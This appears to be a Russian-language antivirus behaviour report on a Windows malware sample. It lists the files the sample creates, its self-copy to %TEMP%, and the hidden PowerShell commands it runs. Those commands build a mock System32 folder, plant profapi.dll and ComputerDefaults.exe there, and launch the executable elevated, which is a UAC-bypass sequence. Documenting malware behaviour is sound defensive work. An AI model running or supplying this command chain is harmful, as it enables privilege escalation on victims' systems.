Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
- %APPDATA%\microsoft\windows\ietldcache\low\index.dat
Самоперемещается
- из <Полный путь к файлу> в %TEMP%\<Имя файла>.exe
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' New-Item '\\?\%WINDIR% \System32' -ItemType Directory' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Move-Item -Path '%TEMP%\profapi.dll' -Destination '\\?\%WINDIR% \System32\profapi.dll'' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Move-Item -Path '%TEMP%\ComputerDefaults.exe' -Destination '\\?\%WINDIR% \System32\ComputerDefaults.exe'' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process -FilePath '%WINDIR% \System32\ComputerDefaults.exe' -Verb RunAs"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' New-Item '\\?\%WINDIR% \System32' -ItemType Directory
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Move-Item -Path '%TEMP%\profapi.dll' -Destination '\\?\%WINDIR% \System32\profapi.dll'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Move-Item -Path '%TEMP%\ComputerDefaults.exe' -Destination '\\?\%WINDIR% \System32\ComputerDefaults.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process -FilePath '%WINDIR% \System32\ComputerDefaults.exe' -Verb RunAs"
- '<SYSTEM32>\computerdefaults.exe'
